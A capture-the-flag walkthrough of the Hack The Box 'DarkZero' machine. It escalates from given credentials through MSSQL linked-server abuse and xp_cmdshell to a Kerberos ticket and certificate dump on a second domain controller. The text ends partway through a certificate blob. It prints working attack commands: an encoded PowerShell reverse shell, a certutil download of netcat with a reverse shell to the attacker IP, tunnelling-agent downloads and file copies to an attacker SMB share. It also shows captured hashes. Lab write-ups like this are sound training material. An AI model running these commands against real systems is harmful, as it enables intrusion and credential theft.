Skip to main content

Documentation Index

Fetch the complete documentation index at: https://hackwithmike.com/llms.txt

Use this file to discover all available pages before exploring further.

Starting the box

Link to the box: https://app.hackthebox.com/machines/darkzero

Port Scan

We start off the box by running a port scan on the provided IP.
Attacker Linux
rustscan -a 10.129.215.80 -r 1-65535 -- -A -vvv -oN DarkZero
Output of Rustscan:
Terminal Output
Open 10.129.215.80:53
Open 10.129.215.80:88
Open 10.129.215.80:135
Open 10.129.215.80:139
Open 10.129.215.80:389
Open 10.129.215.80:445
Open 10.129.215.80:464
Open 10.129.215.80:593
Open 10.129.215.80:636
Open 10.129.215.80:1433
Open 10.129.215.80:2179
Open 10.129.215.80:3268
Open 10.129.215.80:3269
Open 10.129.215.80:5985
Open 10.129.215.80:9389
Open 10.129.215.80:49664
Open 10.129.215.80:49666
Open 10.129.215.80:49670
Open 10.129.215.80:49671
Open 10.129.215.80:49891
Open 10.129.215.80:49908
Open 10.129.215.80:49963
A few key notes:
  • Port 88 is open, which means this is likely a Windows Domain Controller (DC).
  • Port 1433 is open, which is the usual port for MSSQL
  • Port 5985 is open, which is the usual port for WinRM.

Edit the Hosts file

As always, we edit the /etc/hosts file to add the hostname:
Attacker Linux
sudo nano /etc/hosts
/etc/hosts
Nano Interface
10.129.215.80 dc01.darkzero.htb darkzero.htb

Initial User

As is common in real life pentests, you will start the DarkZero box with credentials for the following account john.w / RFulUtONCOL!
We can use NetExec to check if the credentials are valid for AD:
Attacker Linux
nxc smb 10.129.215.80 -u john.w -p 'RFulUtONCOL!'
  • NLTM authentication is allowed.
  • Only default shares are present.

Enumerating Active Directory Environment

Running Bloodhound

Let’s fix our clock synchronization before doing any AD enumerations:
Attacker Linux
sudo rdate -n dc01.darkzero.htb
We can run Bloodhound now:
Attacker Linux
bloodhound-ce-python -d darkzero.htb -u john.w -p 'RFulUtONCOL!' -ns 10.129.215.80 -c all
Key Notes of the Bloodhound results:
  • No outbound control from john.w. No special groups too.
  • Only 3 domain users - john.w, administrator, and krbtgt.

Checking ADCS Attacks

Let’s check if there are any vulnerable ADCS templates:
Attacker Linux
certipy-ad find  -u john.w -p 'RFulUtONCOL!' -dc-ip 10.129.215.80 -vulnerable -enabled
  • No vulnerable template for our controlled user.

Enumerating MSSQL

Since Port 1433 (MSSQL) is open, we can try our credentials on it to see if our user has access to the MSSQL server:
Attacker Linux
impacket-mssqlclient john.w:'RFulUtONCOL!'@10.129.215.80 -windows-auth
We were able to successfully login to the MSSQL server as guest. We can start by enumerating the users. There is nothing of interest for now.
MSSQL Client
SQL (darkzero\john.w  guest@master)> enum_users
UserName             RoleName   LoginName DefDBName DefSchemaName  UserID  SID   
------------------   --------   --------  -------   -------------  ------  -----   
dbo                  db_owner   sa        master    dbo            b'1    '  b'01'

guest                public     NULL      NULL      guest          b'2    '  b'00'

INFORMATION_SCHEMA   public     NULL      NULL      NULL           b'3    '  NULL

sys                  public     NULL      NULL      NULL           b'4    '  NULL

Trying NTLM coercion with MSSQL

Let’s do force authentication (coercion attacks) to our controlled server with xp_dirtree in MSSQL to see if the obtained hash is crackable. We’ll use impacket’s smbserver.py to capture the hash:
Attacker Linux
impacket-smbserver share smb -smb2support
Then, on our MSSQL shell, we use xp_dirtree to list the directory of our SMB server, forcing a NLTM authentication to our server:
MSSQL Client
xp_dirtree \\10.10.14.52\share
On our SMB server, we have successfully captured the Domain Controller’s machine hash, which is likely uncrackable.
SMBServer.py
[*] User DC01\DC01$ authenticated successfully
[*] DC01$::darkzero:aaaaaaaaaaaaaaaa:8bfbf59122ef57c4527bd6a65ce3971c:010100000000000000b218f31436dc01f18dae79b472a36f00000000010010006e00750059007400670066006f004d00030010006e00750059007400670066006f004d000200100079004e006b00700063004e00590079000400100079004e006b00700063004e00590079000700080000b218f31436dc0106000400020000000800300030000000000000000000000000300000e001c6bcbd8c83f129e1195f40dfae8dd4a5eb283d34cd4cbe7e243f916bf1bd0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00330036000000000000000000
We can try it with Hashcat anyway:
Attacker Windows
.\hashcat -m 5600 hash.txt rockyou.txt
  • The rockyou.txt was exhausted. Let’s move on to other attack vectors.

Enumerating Linked Servers

Let’s check if there is any linked servers with our MSSQL instance.
MSSQL Client
SQL (darkzero\john.w  guest@master)> enum_links
SRV_NAME            SRV_PROVIDERNAME   SRV_PRODUCT   SRV_DATASOURCE      SRV_PROVIDERSTRING   SRV_LOCATION   SRV_CAT   
-----------------   ----------------   -----------   -----------------   ------------------   ------------   -------   
DC01                SQLNCLI            SQL Server    DC01                NULL                 NULL           NULL      

DC02.darkzero.ext   SQLNCLI            SQL Server    DC02.darkzero.ext   NULL                 NULL           NULL      

Linked Server       Local Login       Is Self Mapping   Remote Login   
-----------------   ---------------   ---------------   ------------   
DC02.darkzero.ext   darkzero\john.w                 0   dc01_sql_svc
Pay attention to the second half of the output:
MSSQL Client
Linked Server       Local Login       Is Self Mapping   Remote Login   
-----------------   ---------------   ---------------   ------------   
DC02.darkzero.ext   darkzero\john.w                 0   dc01_sql_svc
  • This indicates that we will be authenticated as dc01_sql_svc when interacting with DC02.darkzero.ext.
Using this command ChatGPT provided, we are able to confirm that dc01_sql_svc is sysadmin on DC02.darkzero.ext:
MSSQL Client
SQL (darkzero\john.w  guest@master)> EXEC ('SELECT SUSER_SNAME() AS suser, ORIGINAL_LOGIN() AS original_login, IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin') AT [DC02.darkzero.ext];
suser          original_login   is_sysadmin   
------------   --------------   -----------   
dc01_sql_svc   dc01_sql_svc               1

Using Linked Server

Using the Linked Server on DC02:
From the impacket-MSSQL client menu, we can see that there is a use_link procedure.
MSSQL Client
SQL (darkzero\john.w  guest@master)> use_link "DC02.darkzero.ext"
SQL >"DC02.darkzero.ext" (dc01_sql_svc  dbo@master)>
  • We are in DC02 now.
Let’s check if we can enumerate any users. The results returned nothing of interest.
MSSQL Client
SQL >"dc02.darkzero.ext" (dc01_sql_svc  dbo@master)> enum_impersonate
execute as   database   permission_name   state_desc   grantee    grantor                        
----------   --------   ---------------   ----------   --------   ----------------------------   
b'USER'      msdb       IMPERSONATE       GRANT        dc_admin   MS_DataCollectorInternalUser
Enabling XP_CMDSHELL:
Since we are the sysadmin, we have to privilege to enable xp_cmdshell, which would allow us to execute system commands as the MSSQL server.
MSSQL Client
SQL >"DC02.darkzero.ext" (dc01_sql_svc  dbo@master)> enable_xp_cmdshell
INFO(DC02): Line 196: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(DC02): Line 196: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
Success! We can run system command on DC02 now. Let’s run a quick whoami to check which user is running this MSSQL service. It looks like we have a service account.
MSSQL Client
SQL >"DC02.darkzero.ext" (dc01_sql_svc  dbo@master)> xp_cmdshell whoami
output                 
--------------------   
darkzero-ext\svc_sql
Starting a reverse shell from MSSQL:
Let’s try to run a base64-encoded PowerShell reverse shell payload. However, it was not working properly here and it returned a broken shell.
MSSQL Client
SQL >"DC02.darkzero.ext" (dc01_sql_svc  dbo@master)> xp_cmdshell "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMwA2ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
We will simply download a Netcat binary and run a Netcat reverse shell. We successfully received a proper shell on our listener.
MSSQL Client
SQL >"DC02.darkzero.ext" (dc01_sql_svc  dbo@master)> xp_cmdshell "certutil -urlcache -f http://10.10.14.52/nc.exe C:\users\svc_sql\nc.exe"
SQL >"DC02.darkzero.ext" (dc01_sql_svc  dbo@master)> xp_cmdshell "C:\users\svc_sql\nc.exe 10.10.14.52 443 -e cmd"

Enumerating DC02

We first run a quick WinPEAS to see if there is anything interesting. While there was no output that stood out, we can still try to crack the NetNTLMv2 hash of our controlled user regardless. We tried with Hashcat and it cannot be cracked. Let’s move on.
WinPEAS Output
͹ Enumerating Security Packages Credentials
  Version: NetNTLMv2
  Hash:    svc_sql::darkzero-ext:1122334455667788:ed60e0b39ee874fb8a6c46864a522f0e:010100000000000097e71c751736dc01e0fbc9a6d90f1f30000000000800300030000000000000000000000000300000ac2eeddd7cb5a397fd5890e204f607bf981c22d5f96a7ffbde0d3d903e07bf380a00100000000000000000000000000000000000090000000000000000000000
The DNS cached output indicates that there is a 172.16.20.x internal network, and DC02 is running on 172.16.20.2.
WinPEAS Output
͹ DNS cached --limit 70--
dc01.darkzero.htb  dc01.darkzero.htb  172.16.20.1
dc01.darkzero.htb  dc01.darkzero.htb  10.129.215.80

Running Ligolo to access the internal network

The easiest way to enumerate the internal network is to run Ligolo on our controlled machine. We will first start the proxy server on our attacker Linux:
Attacker Linux
─$ sudo ./proxy -selfcert -laddr 0.0.0.0:8888
[sudo] password for kali: 
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC! 
WARN[0000] Using self-signed certificates               
WARN[0000] TLS Certificate fingerprint for ligolo is: 10AA9FB421D64E6F402973B407C6AAA8F74068836BD5A55B6F8B42FA6EBE0174 
INFO[0000] Listening on 0.0.0.0:8888                     
    __    _             __                       
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ / 
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /  
        /____/                          /____/   

  Made in France ♥            by @Nicocha30!
  Version: 0.7.1-alpha
Then, we will download the Ligolo agent to the victim machine, and run the agent to connect back to our proxy server.
Victim Windows (DC02)
wget 10.10.14.52/ligolo/agent.exe -o agent.exe
Start-Process ".\agent.exe" -ArgumentList "-connect 10.10.14.52:8888 -ignore-cert -retry" -WindowStyle Hidden
Use the session command in the Ligolo Interface to interact with our connected agent.
Ligolo Interface
session
To tunnel our traffic through the victim machine like a VPN, we first have to build a network interface for Ligolo:
Ligolo Interface
interface_create --name "ligolo"
We can run the add_route command to route our traffic to the corresponding subnet addresses. Here, for example, all traffics on our attacker Linux towards 172.16.20.0/16 will be routed to the victim machine via the ligolo interface, and act as we are on the same subnet as the victim machine.
Ligolo Interface
add_route --name ligolo --route 172.16.20.0/16
start

Running Bloodhound

This time, we will run Bloodhound with the Sharphound Ingestor on the victim Windows machine.
Victim Windows (DC02)
wget 10.10.14.52/SharpHound/SharpHound.exe -o s.exe
.\s.exe
On our attacker Linux machine, we will set up an SMB server to receive the output file.
Attacker Linux
impacket-smbserver -smb2support share tools -username "test" -password "test"
On the victim Windows, we will upload the resulting Bloodhound ZIP file to our SMB server.
Victim Windows (DC02)
net use Z: \\10.10.14.52\share /user:test test
copy 20251005101452_BloodHound.zip \\10.10.14.52\share

Running ADCS Enumeration Tools

We will also download the Certify binary on the target Windows.
Victim Windows (DC02)
wget 10.10.14.52/Certify/Certify.exe -o Certify.exe
Enumerate Certificate Authorities:
We will check if the CA on DC02 is vulnerable to ADCS attacks. The output looks normal.
Victim Windows (DC02)
.\Certify.exe enum-cas
...
[*] Enterprise/enrollment certificate authorities:

    Enterprise CA Name            : darkzero-ext-DC02-CA
    DNS Hostname                  : DC02.darkzero.ext
    FullName                      : DC02.darkzero.ext\darkzero-ext-DC02-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=darkzero-ext-DC02-CA, DC=darkzero, DC=ext
    Cert Thumbprint               : 56B26E2CB5DD40283F32A80A07D637782F557F95
    Cert Serial                   : 1643389103EC9DA6407DCE3E015ECD07
    Cert Start Date               : 7/29/2025 7:17:46 AM
    Cert End Date                 : 7/29/2035 7:27:43 AM
    Cert Chain                    : CN=darkzero-ext-DC02-CA,DC=darkzero,DC=ext
    User Specifies SAN            : Disabled
    RPC Request Encryption        : Enabled
    CA Permissions
      Owner: BUILTIN\Administrators             S-1-5-32-544

      Access Rights                                     Principal
      Allow  Enroll                                     NT AUTHORITY\Authenticated Users   S-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators             S-1-5-32-544
      Allow  ManageCA, ManageCertificates               darkzero-ext\Domain Admins         S-1-5-21-1969715525-31638512-2552845157-512
      Allow  ManageCA, ManageCertificates               darkzero-ext\Enterprise Admins     S-1-5-21-1969715525-31638512-2552845157-519
    Enrollment Agent Restrictions : None

    Enabled Certificate Templates:
        DirectoryEmailReplication
        DomainControllerAuthentication
        KerberosAuthentication
        EFSRecovery
        EFS
        DomainController
        WebServer
        Machine
        User
        SubCA
        Administrator
Enumerate Vulnerable ADCS Templates:
We will also check if there’re any vulnerable ADCS templates on DC02 is vulnerable. Again, no vulnerable templates were returned.
Victim Windows (DC02)
.\Certify.exe enum-templates --filter-vulnerable

Checking the Policy_Backup.inf file:

We can see that there is a Policy_Backup.inf file in the root directory, which is uncommon.
Victim Windows (DC02)
PS C:\> dir

    Directory: C:\

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          5/8/2021   1:15 AM                PerfLogs
d-r---         7/29/2025   7:49 AM                Program Files
d-----         7/29/2025   7:48 AM                Program Files (x86)
d-r---         7/29/2025   8:23 AM                Users
d-----         7/30/2025   3:57 PM                Windows
-a----         7/30/2025   6:38 AM          18594 Policy_Backup.inf
The Policy_Backup.inf file contains the privileges on different accounts:
Policy_Backup.inf Snippet
...
SeServiceLogonRight = *S-1-5-20,svc_sql,SQLServer2005SQLBrowserUser$DC02...
...
From the policy backup file, our controlled account svc_sql should have SeServiceLogonRight . But running whoami /priv does not return the right. Our user is also in the S-1-5-6 is the NT AUTHORITY\SERVICE group, but again we are missing the privilege.
Policy_Backup.inf Snippet
...
SeImpersonatePrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6           
SeCreateGlobalPrivilege = *S-1-5-19,*S-1-5-20,*S-1-5-32-544,*S-1-5-6 
...
Checking with whoami /all, we can see that our user is in the NT AUTHORITY\SERVICE group.
Victim Windows (DC02)
Group Name                                 Type             SID                                        
========================================== ================ 
Everyone                                   Well-known group S-1-1-0
BUILTIN\Users                              Alias            S-1-5-32-545
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6
CONSOLE LOGON                              Well-known group S-1-2-1
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11
NT AUTHORITY\This Organization             Well-known group S-1-5-15
NT SERVICE\MSSQLSERVER                     Well-known group S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003
LOCAL                                      Well-known group S-1-2-0
Authentication authority asserted identity Well-known group S-1-18-
Again, since NT AUTHORITY\SERVICE has the SID S-1-5-6, in theory our user should have the SeImpersonatePrivilege. However we are missing the privileges. It is likely because our current logon token type has been restricted. A quick Google on restoring privilege sets for service account returned the following GitHub repo: This however didn’t work, likely because this was an old way to restore privilege and has likely been patched.
Victim Windows (DC02)
wget 10.10.14.52/FullPowers.exe -o FullPowers.exe
.\FullPowers.exe

Retrieving NTLM hash of svc_sql

Dumping Cached Kerberos Ticket

After some research, we learn we have restricted privilege as our current token type is in the interactive logon type (2). To restore the service account’s full privilege, we need to login with a service logon type (5) token.
  • This can be done with a password login using RunasCs.exe to specify the logon type.
  • However, we don’t have password now.
By running klist, we note that we have a cached Kerberos ticket. This is good news since it means that we can likely dump out the ticket for Kerberos authentication.
Victim Windows (DC02)
C:\Windows\system32>klist 
klist

Current LogonId is 0:0x61e61

Cached Tickets: (1)

#0>     Client: svc_sql @ DARKZERO.EXT
		Server: krbtgt/DARKZERO.EXT @ DARKZERO.EXT
		KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
		Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
		Start Time: 11/15/2025 19:24:19 (local)
		End Time:   11/16/2025 5:24:19 (local)
        Renew Time: 11/22/2025 19:24:19 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: DC02

Changing User Password with NTLM Hash

It is possible to change a user password without knowing the current password. We can do it in two ways:
  1. Using mimikatz’s lsadump::changentlm or lsadump::setntlmmodule on the Victim Windows machine, as long as we know the NTLM hash of the user, and the server accepts NTLM authentication.
  2. Using impacket’s changepasswd.py tool on the remote Attacker Linux. Works for both Kerberos & NTLM authentication.

We can run Certify.exe on Windows to extract the valid Kerberos ticket, then either:
  1. Run Rubeus.exe on Windows to extract the NTLM hash of the user.
  2. Use the valid ticket to run remote tools like impacket-changepasswd to directly change the password. In our current scenario, we would also have to run pivoting tools like Ligolo, since the DC is in the unreachable internal network.

Let’s first get Rubeus on the machine.
Victim Windows (DC02)
wget 10.10.14.52/Rubeus.exe -o Rubeus.exe
We will dump out the Kerberos ticket in the .kirbi format.
Victim Windows (DC02)
PS C:\Users\svc_sql> .\Rubeus.exe dump /nowrap /outfile:ticket.kirbi
...
Action: Dump Kerberos Ticket Data (Current User)

[*] Current LUID    : 0x61e61

  UserName                 : svc_sql
  Domain                   : darkzero-ext
  LogonId                  : 0x61e61
  UserSID                  : S-1-5-21-1969715525-31638512-2552845157-1103
  AuthenticationPackage    : Kerberos
  LogonType                : Service
  LogonTime                : 11/15/2025 7:24:19 PM
  LogonServer              : DC02
  LogonServerDNSDomain     : DARKZERO.EXT
  UserPrincipalName        : [email protected]

    ServiceName              :  krbtgt/DARKZERO.EXT
    ServiceRealm             :  DARKZERO.EXT
    UserName                 :  svc_sql
    UserRealm                :  DARKZERO.EXT
    StartTime                :  11/15/2025 7:24:19 PM
    EndTime                  :  11/16/2025 5:24:19 AM
    RenewTill                :  11/22/2025 7:24:19 PM
    Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
    KeyType                  :  aes256_cts_hmac_sha1
    Base64(key)              :  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
    Base64EncodedTicket   :

      doIFgDCCBXygAwIBBaEDAgEWooIEhjCCBIJhggR+MIIEeqADAgEFoQ4bDERBUktaRVJPLkVYVKIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uRVhUo4IEPjCCBDqgAwIBEqEDAgECooIELASCBChZFrxZdDAAVKKHU8ULes28QgpT5Zqtj1L8Pk+4/ktOLV4XRHFypjkQupdLOUv9QkbyLSbVP5nizY2tXlCvX8jC1s/pjLzOxVrnLUnh3Li63D0vJ1qpZFx2qVCV5GDDCaEArTq02sneh08diI4wjtvtH4fP+d68cE2i6py5B7xG6o5IjaYtbCk7PYjcTixt84a/HknSwe6uBWdUR4MpCsd4uyggIB5y4STXJc4YnStxvTv6+PIpnxZgKybgOcnnAkGF1MglAgxOHBOCWRkcKcLmrNxhiZKNo4KTIE7ALhWxgBQTgFuC7Ag0wpRiyzHC26V8H9vdY21RvWNT//6HdmxkelzFPm5GDMY4VV1SyRgxwLe9lQUqfitfiIAM0PkO0TzePIEKQvkD7gCShz1YytLik8QxezpNpdtOWS9cN+78Yh9/dYnGCPswQ8AOoPyIUbYzaRn4MvgBfTgis0by+MbsqdlKkEftrwibtN/uxWSv8Y0Th405kCN4MH/v1QZT7jo8lBIH1V1oZtNwPIQC7nrMV3OeEteFgz1fXDNEpXMn9z4bWTgOE+5F6pPbwwXvJdPGXQFXvKZZUKEpDGHs+OW15G1YEpa36cDR5O4pTKtcfUfhN2vpsWmj4/54IqrFKn+e0w5E1z3QJnyh/HEDV4PWT6+tQpem76BIoCVH6mHO9o5xCGZ3XJ5ZeWc7oR/woehHbT1t+UW3h7BR/85FtIo9kTcS1Mw5PTETHvMt9rp6EQO5K6ieVbc2M9nUjb+OGa2956ScBG0yOZSdjPKChE53EdXzecUWZArdQdKI4Jb4i1/+HhOoNrjhCUF5CRgAnVj2tvEEn62LV6yEeIZI5WtNYFZLOe+YNP6hsIf7Ta8YHiRgeYJIChFbE5khPzRRRw9tw/EoxDpIaRMQHVmOkVazBxw0eXChhkkMZFbqeZTxM7nsAunVYrfGILnpRDYTViBl842zLVZMUAGvSosWqSe25Zv+EWeoeIs2RZ37oOgVb4EjB3YrNySiCvYrAf7eoRcmWO+wn+MKiOEXW0QAICfYNsoqRw3T41gKe3mlhTbN0FDfzORysrc6FB7hcBVvetdTEm8KeXG3QOTQSJZeYaokdtd9Z0TqYPSx2HvHVLED/wQUSvLo9sqdFXoh2ewAfFXJYXCaegFumb7BUe+1dB3BbxcBuzmwp49WnYT+seqy7lleGzbxXmO1DjYdPyJVnCj8PzwNUgnW9gFtxzkeaJD0UR8n0Iu4c8dSVDs6J7N6hR5JhROrlcxqhWrsajvuNzH1DxMsZucnPlHI1OXtguMa66+2URF0Wc8ou288PfuK5Mcwd/LCi86x98gAmE51NzVApoAolwB0bga+b9F7aiu/Y8FSUKhzl1CtopHh5jne6JBAzLMzS+AA2JlvbXGEJ/mpm3cqxXXKQKOB5TCB4qADAgEAooHaBIHXfYHUMIHRoIHOMIHLMIHIoCswKaADAgESoSIEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoQ4bDERBUktaRVJPLkVYVKIUMBKgAwIBAaELMAkbB3N2Y19zcWyjBwMFAEDhAAClERgPMjAyNTExMTYwMzI0MTlaphEYDzIwMjUxMTE2MTMyNDE5WqcRGA8yMDI1MTEyMzAzMjQxOVqoDhsMREFSS1pFUk8uRVhUqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5FWFQ=
The KRB-CRED files (.kirbi) are output as base64 blobs and can be reused with the ptt function, or Mimikatz’s kerberos::ptt functionality.
  • Here, since the ticket’s LoginType is Service (Type 5), the tickets are non-exportable by default in Service Logon token. Therefore, even though we used the /outfile flag, no file was generated.
We got this error when we are trying to save the ticket manually, or using the base64 blob in the command line:
Victim Windows (DC02)
[-] Maximum prompt length is 335 characters. Current prompt is 1923
Since our reverse shell cannot take the long base64 string, we’ll create the ticket file on Linux, and upload the ticket file to the target system.
Attacker Linux
echo 'doIFgDCCBXygAwIBBaEDAgEWooIEhjCCBIJ....' > ticket.kirbi
Victim Windows (DC02)
wget 10.10.14.52/ticket.kirbi -o ticket.kirbi
However, when we try to run Rubeus with the ticket file, the following error was returned:
Victim Windows (DC02)
[!] Unhandled Rubeus exception:                                                    Asn1.AsnException: value overflow
	at Asn1.AsnElt.Decode(Byte[] buf, Int32 off, Int32 maxLen, Int32& tc, Int32& tv, Boolean& cons, Int32& valOff, Int32& valLen)
	at Asn1.AsnElt.DecodeNoCopy(Byte[] buf, Int32 off, Int32 len)
	at Asn1.AsnElt.DecodeNoCopy(Byte[] buf, Int32 off, Int32 len)
	at Asn1.AsnElt.Decode(Byte[] buf, Int32 off, Int32 len, Boolean exactLength)
	at Rubeus.KRB_CRED..ctor(Byte[] bytes)
	at Rubeus.Commands.Changepw.Execute(Dictionary`2 arguments)
	at Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
	at Rubeus.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)
  • From LLM: This ASN.1 “value overflow” error typically means the ticket you’re feeding into changepw is not a valid KRB_CRED structure, even if it looks like a ticket.
Oh, so the base64 blob is not a valid .kirbi file by itself. We have to decode it into the raw binary:
Attacker Linux
echo 'doIFgDCCBXygAwIBBaEDAgEWooI......' | base64 -d > ticket.kirbi
The decoded binary ticket is working now.
Victim Windows (DC02)
.\Rubeus.exe describe /ticket:ticket.kirbi
...
[*] Action: Describe Ticket


  ServiceName              :  krbtgt/DARKZERO.EXT
  ServiceRealm             :  DARKZERO.EXT
  UserName                 :  svc_sql
  UserRealm                :  DARKZERO.EXT
  StartTime                :  11/15/2025 7:24:19 PM
  EndTime                  :  11/16/2025 5:24:19 AM
  RenewTill                :  11/22/2025 7:24:19 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

Running Certify.exe to request a valid login certificate:
Regardless, we can use Certify.exe to use the current cached ticket on Windows to request for a valid login certificate. We will run the enum-cas module to check the name of the CA, which is darkzero.ext\darkzero-ext-DC02-CA.
Victim Windows (DC02)
wget 10.10.14.52/Certify/Certify.exe -o Certify.exe
.\Certify.exe enum-cas
We will then request a valid user login certificate.
Victim Windows (DC02)
.\Certify.exe request --ca darkzero.ext\darkzero-ext-DC02-CA --template user

   _____          _   _  __          
  / ____|        | | (_)/ _|         
 | |     ___ _ __| |_ _| |_ _   _    
 | |    / _ \ '__| __| |  _| | | |   
 | |___|  __/ |  | |_| | | | |_| |   
  \_____\___|_|   \__|_|_|  \__, |   
                             __/ |   
                            |___./   
  v2.0.0                         

[*] Action: Request a certificate

[*] Current user context    : darkzero-ext\svc_sql
[*] No subject name specified, using current context as subject.

[*] Template                : user
[*] Subject                 : CN=svc_sql, CN=Users, DC=darkzero, DC=ext

[*] Certificate Authority   : darkzero.ext\darkzero-ext-DC02-CA
[*] CA Response             : The certificate has been issued.
[*] Request ID              : 3

[*] Certificate (PFX)       :

MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqhkiG9w0BBwGggCSABIID6DCCBVwwggVYBgsqhkiG9w0BDAoBAaCCBMIwggS+AgEAMA0GCSqGSIb3DQEBAQUABIIEqDCCBKQCAQACggEBAN/lb1I91jHu2LgjrYP4NQQDn0a9JjhWJNQ118fsaTqieX44QH+9LSHAlbK4G1FufZ8joqYxerX55NNkVWz/fBb+2qLp7LceyKk3Jl19Cd9nEUcLqNwubnKtTblTHxob1EbeCpXk5iojKfSSXwNn6EXkswvtBHPhRYKfys01PlYlA0wb/yLYARXP46CKQcC2YmMOwmrNuJrVmJOzpBp91ob8fnm2j+2GIWWeEBdn6mzo3hICYhZLd9paF5l3OHPFEszFtAHtguo10b6nBgr3TYcfdNI0Td/dCSpjeYeJHIye8TW53Z9RBd1Bud7MQv14mpZ3vb5vGWJ820vt2N1+JI0CAwEAAQKCAQEAtWoEL1Enc0Iim+FcwOemnWAJ+JlelJtIMCKIeteV1Aq+AoW1zUsNfKG9Khh/GhY69206ZwsEcNrQjHBpv22rsD5EDWkZgq8Qy/uBvJKKI1gx6a0K341HtOezaIxvUQpnkBxt21KjJFVls2O+VNYmoCtU4D7mMra/Sb4L5wZTQhwreya+WmCHDDgVvf5woQvJyR8SR6D2YLgPdw/+XmLEdXtIFE7MrqOEirtbYpa3o9JvxpSGieHb6jweEqdkhBUaVPK6NGur95rhkMAV7c5kHLycyH7XTIYjNVQmo8TFoxBw+zJQLz8VTWTWgHGYf+yDVGdxIdONxEkfHwc/S7jqCQKBgQDuY+yGBJ/f/0mf/hPvMME1OyIqo4oM/hukq8iuqq9fNqRXlg1I/It43sQHS6etWodr6GFrvTYNEzBTbm59jirJ1dK4GXv94DHyq8S0s7rF2T9plO2zuuEGrKWzfNs5SHfK5pbm88qGMqU0Po1RbPjp7Zwr6jAzGBTSUlD1HcZD8wKBgQDwb2uo5cMb9u6x6GJBP4OVA2WXSvwjPWVEi3IZ62jAG7/ciJcKJwBU5uxc5tqFZHr6u+6rhA4q3KUc1KBtyLylfzi3vpHRYvTzKNIlJx9JaClLjfrKGx+gvrYDGBgHHYSMvGauWU2vuoeFyKAXDd3Tp6175cB/TCgrpXUOxpKVfwKBgQDDb2gY9vGa0